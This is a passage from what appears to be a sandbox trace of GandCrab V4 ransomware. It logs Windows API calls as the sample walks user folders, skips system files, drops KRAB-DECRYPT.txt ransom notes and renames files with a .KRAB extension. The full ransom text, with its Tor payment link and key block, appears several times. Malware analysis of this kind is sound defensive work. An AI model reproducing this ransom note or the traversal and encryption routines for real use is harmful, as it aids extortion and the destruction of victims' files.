DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.683] WriteFile (in: hFile=0x430, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.684] CloseHandle (hObject=0x430) returned 1 [0056.684] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.684] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.684] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x37a)) [0056.685] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.685] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.685] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.685] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a08d2ca4dee3d.lock") returned 80 [0056.685] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x430 [0056.686] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.686] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.686] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 57 [0056.686] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0056.686] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbdce0 [0056.686] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.686] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.687] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.687] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.687] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.687] lstrcmpW (lpString1="AssetCache", lpString2=".") returned 1 [0056.687] lstrcmpW (lpString1="AssetCache", lpString2="..") returned 1 [0056.687] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="AssetCache" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0056.687] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0056.687] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.687] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.687] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.687] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.687] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.687] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.688] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.688] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\KRAB-DECRYPT.txt") returned 85 [0056.688] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\assetcache\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0056.779] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.779] WriteFile (in: hFile=0x44c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.780] CloseHandle (hObject=0x44c) returned 1 [0056.780] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.780] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.780] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x3d7)) [0056.781] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.781] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.781] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.781] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a08d2ca4dee3d.lock") returned 91 [0056.781] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\assetcache\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x44c [0056.788] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.788] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 68 [0056.789] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0056.789] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbe0a0 [0056.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.789] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.789] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.789] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.789] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.789] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.789] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.789] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a08d2ca4dee3d.lock" [0056.789] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.789] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 96 [0056.790] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a08d2ca4dee3d.lock") returned 91 [0056.790] lstrlenW (lpString=".lock") returned 5 [0056.790] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.790] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.790] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.790] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.791] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.791] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.791] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.791] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\KRAB-DECRYPT.txt" [0056.791] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.791] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\KRAB-DECRYPT.txt.KRAB") returned 89 [0056.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\KRAB-DECRYPT.txt") returned 84 [0056.791] lstrlenW (lpString=".txt") returned 4 [0056.791] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.791] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.791] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.792] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\KRAB-DECRYPT.txt") returned 84 [0056.792] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\KRAB-DECRYPT.txt") returned 84 [0056.792] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.792] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.792] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.792] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.792] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.792] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.792] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.792] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.795] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.795] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.795] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.795] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0056.795] lstrcmpW (lpString1="NAHQNPMN", lpString2=".") returned 1 [0056.795] lstrcmpW (lpString1="NAHQNPMN", lpString2="..") returned 1 [0056.795] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="NAHQNPMN" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN" [0056.795] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\" [0056.795] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.796] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.796] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.796] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.796] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.796] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.796] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.796] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\\\KRAB-DECRYPT.txt") returned 94 [0056.796] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\assetcache\\nahqnpmn\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0056.797] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8re